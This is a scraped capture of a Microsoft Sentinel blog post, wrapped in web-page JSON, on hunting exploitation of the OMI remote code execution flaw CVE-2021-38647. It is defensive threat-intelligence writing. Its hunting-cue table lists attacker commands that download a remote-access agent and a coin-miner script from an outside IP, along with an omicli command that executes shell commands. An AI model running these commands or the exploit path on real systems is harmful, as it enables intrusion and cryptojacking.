Page 7 of 38

{"id":"UserPage","type":"USER","urlPath":"/users/:login/:userId","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"HealthCheckPage","type":"COMMUNITY","urlPath":"/health","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"OccasionReplyPage","type":"OCCASION_REPLY","urlPath":"/event/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"P
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ManageMembersPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/manage/:tab?","__typename":"PageDescriptor"},"__typename":"P
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"SearchResultsPage","type":"COMMUNITY","urlPath":"/search","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"BlogReplyPage","type":"BLOG_REPLY","urlPath":"/blog/:boardId/:messageSubject/:messageId/replies/:replyId","__typename":"PageDescriptor"
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"GroupHubPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TermsOfServicePage","type":"COMMUNITY","urlPath":"/termsofservice","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"CategoryPage","type":"CATEGORY","urlPath":"/category/:categoryId","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"ForumViewAllTopicsPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId/all-topics/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"TkbPostPage","type":"TKB","urlPath":"/category/:categoryId/kbs/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource
{"lastUpdatedTime":1775111737889,"localOverride":null,"page":
{"id":"GroupHubPostPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/:boardId/create","__typename":"PageDescriptor"},"__typename":"Pa
components/context/AppContext/AppContextProvider-0":{"__typename":"CachedAsset","id":"text:en_US-components/context/AppContext/AppContextProvider-0","value":{"noCommunity":"Cannot find
community","noUser":"Cannot find current user","noNode":"Cannot find node with id {nodeId}","noMessage":"Cannot
find message with id {messageId}","userBanned":"We're sorry, but you have been banned from using this
site.","userBannedReason":"You have been banned for the following reason:
{reason}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/Loading/LoadingDot-0":
{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Loading/LoadingDot-0","value":
{"title":"Loading..."},"localOverride":false},"Rank:rank:25":
{"__typename":"Rank","id":"rank:25","position":3,"name":"Former
Employee","color":"333333","icon":null,"rankStyle":"TEXT"},"User:user:528639":
{"__typename":"User","id":"user:528639","uid":528639,"login":"russmc","deleted":false,"avatar":
{"__typename":"UserAvatar","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/dS01Mjg2MzktMzExMzE4aTYwOUREQzZGMUIwQ
{"__ref":"Rank:rank:25"},"email":"","messagesCount":4,"biography":null,"topicsCount":2,"kudosReceivedCount":10,"kudosGivenCount":0,"kudosWeig
{"__typename":"RegistrationData","status":null,"registrationTime":"2020-01-22T08:05:18.887-
08:00","confirmEmailStatus":null},"followersCount":null,"solutionsCount":0},"Category:category:microsoft-sentinel":
{"__typename":"Category","id":"category:microsoft-sentinel","entityType":"CATEGORY","displayId":"microsoft-sentinel","nodeType":"category","depth":4,"title":"Microsoft Sentinel","shortTitle":"Microsoft Sentinel","parent":
{"__ref":"Category:category:microsoft-security"}},"Category:category:top":
{"__typename":"Category","id":"category:top","entityType":"CATEGORY","displayId":"top","nodeType":"category","depth":0,"title":"Top","shortTitle"
{"__typename":"Category","id":"category:communities","entityType":"CATEGORY","displayId":"communities","nodeType":"category","depth":1,"paren
{"__ref":"Category:category:top"},"title":"Communities","shortTitle":"Communities"},"Category:category:products-services":{"__typename":"Category","id":"category:products-services","entityType":"CATEGORY","displayId":"products-services","nodeType":"category","depth":2,"parent":
{"__ref":"Category:category:communities"},"title":"Products","shortTitle":"Products"},"Category:category:microsoft-security":{"__typename":"Category","id":"category:microsoft-security","entityType":"CATEGORY","displayId":"microsoft-security","nodeType":"category","depth":3,"parent":
{"__ref":"Category:category:products-services"},"title":"Microsoft Security","shortTitle":"Microsoft
Security","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":
{"__typename":"PolicyResult","failureReason":null}}},"Blog:board:MicrosoftSentinelBlog":
{"__typename":"Blog","id":"board:MicrosoftSentinelBlog","entityType":"BLOG","displayId":"MicrosoftSentinelBlog","nodeType":"board","depth":5,"c
{"__typename":"RepliesProperties","sortOrder":"REVERSE_PUBLISH_TIME","repliesFormat":"threaded"},"tagProperties":
{"__typename":"TagNodeProperties","tagsEnabled":
{"__typename":"PolicyResult","failureReason":null}},"requireTags":false,"tagType":"PRESET_ONLY","description":"
Microsoft Sentinel is an industry-leading SIEM & AI-first platform powering agentic defense across the entire security
ecosystem.
","title":"Microsoft Sentinel Blog","shortTitle":"Microsoft Sentinel Blog","parent":{"__ref":"Category:category:microsoft-sentinel"},"ancestors":{"__typename":"CoreNodeConnection","edges":[{"__typename":"CoreNodeEdge","node":
{"__ref":"Community:community:gxcuf89792"}},{"__typename":"CoreNodeEdge","node":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 8 of 38

{"__ref":"Category:category:communities"}},{"__typename":"CoreNodeEdge","node":
{"__ref":"Category:category:products-services"}},{"__typename":"CoreNodeEdge","node":
{"__ref":"Category:category:microsoft-security"}},{"__typename":"CoreNodeEdge","node":
{"__ref":"Category:category:microsoft-sentinel"}}]},"userContext":
{"__typename":"NodeUserContext","canAddAttachments":false,"canUpdateNode":false,"canPostMessages":false,"isSubscribed":false},"theme":
{"__ref":"Theme:customTheme1"},"boardPolicies":{"__typename":"BoardPolicies","canViewSpamDashBoard":
{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.feature.moderation_spam.action.access_spam_quarantine.allowed.accessDenied","key"
[]}},"canArchiveMessage":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.content_archivals.enable_content_archival_settings.accessDenied","key":"error.lithium
[]}},"canPublishArticleOnCreate":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.forums.policy_can_publish_on_create_workflow_action.accessDenied","key":"error.lit
[]}}},"linkProperties":
{"__typename":"LinkProperties","isExternalLinkWarningEnabled":false}},"BlogTopicMessage:message:2764093":
{"__typename":"BlogTopicMessage","uid":2764093,"subject":"Hunting for OMI Vulnerability Exploitation with Azure
Sentinel","id":"message:2764093","entityType":"BLOG_ARTICLE","eventPath":"category:microsoft-sentinel/category:microsoft-security/category:products-services/category:communities/community:gxcuf89792board:MicrosoftSentinelBlog/message:2764093","revisionNum":25,"repliesCount":3,"author":
{"__ref":"User:user:528639"},"depth":0,"hasGivenKudo":false,"board":
{"__ref":"Blog:board:MicrosoftSentinelBlog"},"conversation":
{"__ref":"Conversation:conversation:2764093"},"messagePolicies":
{"__typename":"MessagePolicies","canPublishArticleOnEdit":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.forums.policy_can_publish_on_edit_workflow_action.accessDenied","key":"error.lithi
[]}},"canModerateSpamMessage":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.feature.moderation_spam.action.moderate_entity.allowed.accessDenied","key":"error.li
[]}},"canReply":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.forums.action.message.reply_to_entity.allow.accessDenied","key":"error.lithium.polici
[]}},"canAcceptSolution":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.accepted_solutions.action_allow.message.mark_as_accepted_solution.accessDenied","k
[]}},"canRejectSolution":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.accepted_solutions.action_allow.message.unmark_as_accepted_solution.accessDenied"
[]}},"canTag":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.labels.action.labelableentity.set_labels.allow.accessDenied","key":"error.lithium.policie
[]}},"canEdit":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.forums.action_allow.edit_message.accessDenied","key":"error.lithium.policies.forums.
[]}},"canKudo":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.kudos.action.entity.give_kudos.allow.accessDenied","key":"error.lithium.policies.kudo
[]}}},"contentWorkflow":
{"__typename":"ContentWorkflow","state":"PUBLISH","scheduledPublishTime":null,"scheduledTimezone":null,"userContext":
{"__typename":"MessageWorkflowContext","canSubmitForReview":null,"canEdit":false,"canRecall":null,"canSubmitForPublication":null,"canReturnTo
{"__ref":"ModerationData:moderation_data:2764093"},"teaser":"\n\n
Microsoft Threat Intelligence Center (MSTIC) have been monitoring for signs of exploitation of the OMI vulnerability and
investigating detections to further protect customers.
","body":"
Russell McDonald, Roberto Rodriguez, and Ajeet Prakash
\n
Special thanks to: Ross Bevington 
\n\n
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)
in the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)
have been monitoring for signs of exploitation and investigating detections to further protect customers. Following the
MSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this
blog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders
to look for on host machines, and to share new detections in Azure Sentinel.
\n\n\n
At Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,
and to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 9 of 38

of the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic
host enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details
available below in Hunting cues section). We have also seen others in the community report similar behavior to include
installs of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. 
Due to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we
are anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).
\n\n\n
OMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is
also designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a
much more viable CIM Object Manager for embedded systems and other infrastructure components that have memory
constraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most
UNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.
\n\n\n
In a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can
execute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401
unauthorized response. However, the user is able to execute commands with root privileges.
\n
More details are available in the MSRC CVE-2021-38647 post and the finder company Wiz blog post.
\n\n\n
In addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to
explore at the endpoint level.
\n\n\n
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
\n
The SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux
system. There are several providers or classes available through the SCXcore provider which can be used to gather
information from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.
\n\n
In addition, there is one support provider named the RunAsProvider which provides the following classes:
\n
\n
ExecuteCommand: Executes any UNIX/Linux native command
\n
ExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell
\n
ExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell
\n
\n\n\n
Based on the initial research from Wiz, the following command was used to explore network traffic in order to craft an
HTTP request to test the vulnerability:
\n\n\n\n\n\n\n
/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }
ExecuteShellCommand { command 'id' timeout 0 }
\n\n
During testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify
additional sources of data. The following command was used:
\n\n\n\n\n\n\n
/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 10 of 38

\n\n
After running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the
RunAsProvider :: Invoke_ExecuteShellCommand class:
\n
Checking logs from auditd via Syslog, we also identified where the code was being executed from:
\n\n
We tested the same in our lab environments, and we observed the same behavior which is shown below:
\n\n\n
Looking at the code behind the components of the RunAs providers, there are some references to it:
\n\n\n
More information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider
for Operations Manager
\n\n\n\n
Similarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference
to ExecuteScript.  In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:
\n\n\n
In this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar
to /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same
/var/opt/microsoft/scx/tmp current working directory.
\n
Of note, this is the method we have seen used with attackers attempting to install coin miners.
\n\n
Azure Sentinel coverage
\n
Relevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel
has made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic
approaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be
onboarded to Azure Sentinel.
\n\n
Some Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.
Attackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via
HTTPS to port listening to OMI to gain initial access to the machine.
\n\n
The Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI
management ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema
(imNetworkSession)  as well as a few other logs to look for this network connection activity from an external IP address.
Where available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the
query has been shipped as a hunting query.
\n
Normalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be
deployed in a click using an ARM Template.
\n\n\n\n\n\n\n\n\n
Customers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query
linked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are
not updated to the latest version that prevents this vulnerability.
\n
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 11 of 38

[updated Sept 27, 2021]
\n\n\n\n\n\n\n\n\n
Additionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an
Azure Environment with OMI installed. With the continuous export feature of Security Center, these security
recommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested
Recommendations table to build a detection query to show vulnerable machines.
\n\n\n\n\n\n\n\n\n
Azure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where
customers can run a quick query to check if they are impacted by this Vulnerability.
\n\n\n\n\n\n\n
\n
AzureActivity
| where CategoryValue == 'ServiceHealth'
| where isnotempty(Properties) and Properties has 'CVE-2021-38645'
| extend defaultLanguageTitle =
tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)
\n
\n\n\n
[updated Sept 24, 2021]
\n
The below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure
Sentinel Syslog data connector to explore the use of SCX Execute RunAs providers.
\n\n\n\n\n\n\n\n\n
Execute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux
command and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and
depending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider
is used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx
(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of
products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
\n\n
Hunting cues and IOCs
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Common enumeration
commands seen
\n
\n
uname -a, id, netstat, ps
\n
\n
Exploitation attempt
\n
\n
wget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O
dwagent_generic.sh
\n
\n
Exploitation attempt
\n
\n
echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh
> go.sh
\n
\n
Exploitation attempt
\n
curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 12 of 38

\n \n
\n
Scanning IPs
\n
\n
13.212.235.12
\n
\n
Scanning IPs
\n
\n
142.93.148.12
\n
\n
Scanning IPs
\n
\n
171.224.80.216
\n
\n
Scanning IPs
\n
\n
185.220.100.245
\n
\n
Scanning IPs
\n
\n
216.151.191.152
\n
\n
Scanning IPs
\n
\n
23.129.64.140
\n
\n
Scanning IPs
\n
\n
31.44.185.115
\n
\n
Scanning IPs
\n
\n
46.30.42.126
\n
\n
Scanning IPs
\n
\n
5.45.127.209
\n
\n
Scanning IPs
\n
\n
94.198.42.158
\n
\n\n
References: 
\n
MSRC communications:
\n
\n
CVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution
Vulnerability
\n
Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security
Response Center
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 13 of 38

\n
\n
Azure Security Center Guidance:
\n
\n
Using ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech
Community
\n
\n
Sentinel Detections:
\n
\n
Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub
\n
Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub
\n
Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,
2021]
\n
\n
Software and tools:
\n
\n
GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager
\n
GitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)
\n
\n\n
\n
Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go
(github.com)
\n
\n\n
Public Discussion About Attacks in the wild:
\n
\n
chris doman on Twitter: \":loudspeaker:OMIGOD (CVE-2021-38647) is now under active exploitation :loudspeaker:
We took at a look at one of the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI
is installed https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\" / Twitter
\n
Andrew Morris on Twitter: \"The Azure \"OHMIGOD\" vulnerability (CVE-2021-38647) is increasing a good bit.
~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN
users and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\" / Twitter
\n
Kevin Beaumont on Twitter: \"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given
Mirai can enter networks and spread laterally via multiple vulns, this might be problematic.
https://t.co/8nXSEcMHYa\" / Twitter
\n
\n","body@stringLength":"24902","rawBody":"
Russell McDonald, Roberto Rodriguez, and Ajeet Prakash
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 14 of 38

\n
Special thanks to: Ross Bevington 
\n\n
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-38647)
in the Open Management Infrastructure (OMI) Framework, analysts in the Microsoft Threat Intelligence Center (MSTIC)
have been monitoring for signs of exploitation and investigating detections to further protect customers. Following the
MSRC guidance to block ports that you aren't using and to ensure the OMI service is patched are great first steps. In this
blog, we have some things to share about current attacks in the wild, agents and software involved, indicators for defenders
to look for on host machines, and to share new detections in Azure Sentinel.
\n\n
Attacks in the wild
\n
At Microsoft we monitor for attacks against our cloud services to inform our future security research, track emerging threats,
and to improve the detection coverage of our security offerings.  As part of that work, MSTIC is monitoring for exploitation
of the OMI related RCE (CVE-2021-38647).  To date we have seen several active exploitation attempts ranging from basic
host enumeration (running uname, id, ps commands) to attempts to install a crypto currency miner or file share. (Details
available below in Hunting cues section). We have also seen others in the community report similar behavior to include
installs of the Mirai botnet. While many of the attackers are looking for port 5986, we are also seeing attacks on port 1270. 
Due to the number of easily adaptable proof of concept exploits available and the volume of reconnaissance-type attacks, we
are anticipating an increase in the number of effects-type attacks (coin miners, bot installation, etc.).
\n\n
What is OMI?
\n
OMI is an open-source project to further the development of a production quality implementation of the OMI CIMOM is
also designed to be portable and highly modular. In order to attain its small footprint, it is coded in C, which also makes it a
much more viable CIM Object Manager for embedded systems and other infrastructure components that have memory
constraints for their management processor. OMI is also designed to be inherently portable. It builds and runs today on most
UNIX® systems and Linux. In addition to OMI's small footprint, it also demonstrates very high performance.
\n\n
Unauthenticated remote command execution?
\n
In a nutshell, anyone with access to an endpoint running a vulnerable version (less than 1.6.8.1) of the OMI agent can
execute arbitrary commands over an HTTP request without an authorization header. The expected behavior would be a 401
unauthorized response. However, the user is able to execute commands with root privileges.
\n
More details are available in the MSRC CVE-2021-38647 post and the finder company Wiz blog post.
\n\n
Endpoint Execution Context
\n
In addition to monitoring for incoming connections over ports 5986, 5985 or 1270 to vulnerable systems, there is more to
explore at the endpoint level.
\n\n
SCXCore Providers
\n
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 15 of 38

SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
\n
The SCXcore provides a CIMOM provider, based on OMI, to return logging and statistical information for a UNIX or Linux
system. There are several providers or classes available through the SCXcore provider which can be used to gather
information from an endpoint such as  MemoryStatisticalInformation or FileSystemStatisticalInformation.
\n\n
In addition, there is one support provider named the RunAsProvider which provides the following classes:
\n
\n
ExecuteCommand: Executes any UNIX/Linux native command
\n
ExecuteShellCommand: Executes any UNIX/Linux command using the /bin/sh shell
\n
ExecuteScript: Executes any UNIX/Linux script using the /bin/sh shell
\n
\n\n
Executing Code via ExecuteShellCommand
\n
Based on the initial research from Wiz, the following command was used to explore network traffic in order to craft an
HTTP request to test the vulnerability:
\n\n\n\n\n\n\n
/opt/omi/bin/omicli --hostname 192.168.1.1 -u azureuser -p Password1 iv root/scx { SCX_OperatingSystem }
ExecuteShellCommand { command 'id' timeout 0 }
\n\n
During testing, we used the Scxadmin tool, available as part of SCX, to increase all logging to VERBOSE and identify
additional sources of data. The following command was used:
\n\n\n\n\n\n\n
/opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose
\n\n
After running public proof-of-concepts to test the vulnerability, we validated that the code was being handled by the
RunAsProvider :: Invoke_ExecuteShellCommand class:
\n
Checking logs from auditd via Syslog, we also identified where the code was being executed from:
\n\n
We tested the same in our lab environments, and we observed the same behavior which is shown below:
\n\n\n
Looking at the code behind the components of the RunAs providers, there are some references to it:
\n\n\n
More information about SCXcore is available here: GitHub - microsoft/SCXcore: System Center Cross Platform Provider
for Operations Manager
\n\n
Executing Code via ExecuteScript
\n\n
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 16 of 38

Similarly, scripts can be run using the ExecuteScript provider. In this case, the body of the http request contains a reference
to ExecuteScript.  In the below example, the command ‘id’ is base64 encoded to ‘aWQ=’:
\n\n\n
In this case, the script is passed into a temp directory which you can see in the execve logs. Look for a commandline similar
to /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/scx*. This command will still show as being run from the same
/var/opt/microsoft/scx/tmp current working directory.
\n
Of note, this is the method we have seen used with attackers attempting to install coin miners.
\n\n
Azure Sentinel coverage
\n
Relevant security data required for understanding the impact of an attack is produced in multiple locations. Azure Sentinel
has made it easy to collect the data from multiple data sources easily. This section of the post contains guidance and generic
approaches to look for the OMI related activity in various data feeds that are available by default in Azure Sentinel or can be
onboarded to Azure Sentinel.
\n\n
Some Azure products, such as Configuration Management, open an HTTP/S port (1270/5985/5986) listening for OMI.
Attackers can exploit the vulnerability in OMI where these ports are open by sending a specially crafted message via
HTTPS to port listening to OMI to gain initial access to the machine.
\n\n
The Azure Sentinel query linked below tries to identify connection attempts from the external IP addresses to the OMI
management ports (5985,5986,1270). The query primarily leverages the Network Session normalization schema
(imNetworkSession)  as well as a few other logs to look for this network connection activity from an external IP address.
Where available, it tries to restrict the results to the relevant OMI process. The results can sometimes be noisy; hence the
query has been shipped as a hunting query.
\n
Normalizing parsers for leveraging the imNetworkSession normalized schema are required for this query to work and can be
deployed in a click using an ARM Template.
\n\n\n\n\n\n\n\n\n
Customers can also use Heartbeat logs that monitors agent health to find vulnerable machine. The Azure Sentinel query
linked below tries to leverage Heartbeat data to find OMS-agents that are reporting to the Azure Sentinel workspace but are
not updated to the latest version that prevents this vulnerability.
\n
[updated Sept 27, 2021]
\n\n\n\n\n\n\n\n\n
Additionally, Azure Security Center generates detailed security recommendations if there are vulnerable machines in an
Azure Environment with OMI installed. With the continuous export feature of Security Center, these security
recommendations can be imported into Azure Sentinel. Azure Sentinel leverages this data populated in Security Nested
Recommendations table to build a detection query to show vulnerable machines.
\n\n\n\n\n\n\n\n\n
Azure Service Health has also sent notifications to potentially impacted customers. In the impacted environments where
customers can run a quick query to check if they are impacted by this Vulnerability.
\n\n\n\n\n\n\n
\n
AzureActivity
| where CategoryValue == 'ServiceHealth'
| where isnotempty(Properties) and Properties has 'CVE-2021-38645'
| extend defaultLanguageTitle =
tostring(parse_json(tostring(parse_json(Properties).eventProperties)).defaultLanguageTitle)
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 17 of 38

\n
\n\n
SCX RunAs Provider
\n
[updated Sept 24, 2021]
\n
The below hunting query uses security events from the Microsoft Audit Collection Tool (AUOMS) collected via the Azure
Sentinel Syslog data connector to explore the use of SCX Execute RunAs providers.
\n\n\n\n\n\n\n\n\n
Execute RunAs providers such as the ExecuteShellCommand and ExecuteScript can be used to execute any UNIX/Linux
command and script respectively using the /bin/sh shell. Execution occurs from the /var/opt/microsoft/scx/tmp directory and
depending on the execution RunAs provider, execution can be a command or a script. If the ExecuteScript RunAs provider
is used, then the script file is created in the following directory /bin/sh /etc/opt/microsoft/scx/conf/tmpdir/ with the prefix scx
(e.g. scxzOy96). SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of
products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
\n\n
Hunting cues and IOCs
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Common enumeration
commands seen
\n
\n
uname -a, id, netstat, ps
\n
\n
Exploitation attempt
\n
\n
wget hxxps://www.dwservice.net/download/dwagent_generic.sh  -O
dwagent_generic.sh
\n
\n
Exploitation attempt
\n
\n
echo curl hxxps://www.dwservice.net/download/dwagent_generic.sh  --output dw.sh
> go.sh
\n
\n
Exploitation attempt
\n
\n
curl -fSsL hxxp://104.168.213.31:55879/coinlinux/runMiner.sh
\n
\n
Scanning IPs
\n
\n
13.212.235.12
\n
\n
Scanning IPs
\n
\n
142.93.148.12
\n
\n
Scanning IPs
\n
\n
171.224.80.216
\n
\n \n
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 18 of 38

Scanning IPs
\n
185.220.100.245
\n
\n
Scanning IPs
\n
\n
216.151.191.152
\n
\n
Scanning IPs
\n
\n
23.129.64.140
\n
\n
Scanning IPs
\n
\n
31.44.185.115
\n
\n
Scanning IPs
\n
\n
46.30.42.126
\n
\n
Scanning IPs
\n
\n
5.45.127.209
\n
\n
Scanning IPs
\n
\n
94.198.42.158
\n
\n\n
References: 
\n
MSRC communications:
\n
\n
CVE-2021-38647 - Security Update Guide - Microsoft - Open Management Infrastructure Remote Code Execution
Vulnerability
\n
Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions – Microsoft Security
Response Center
\n
\n
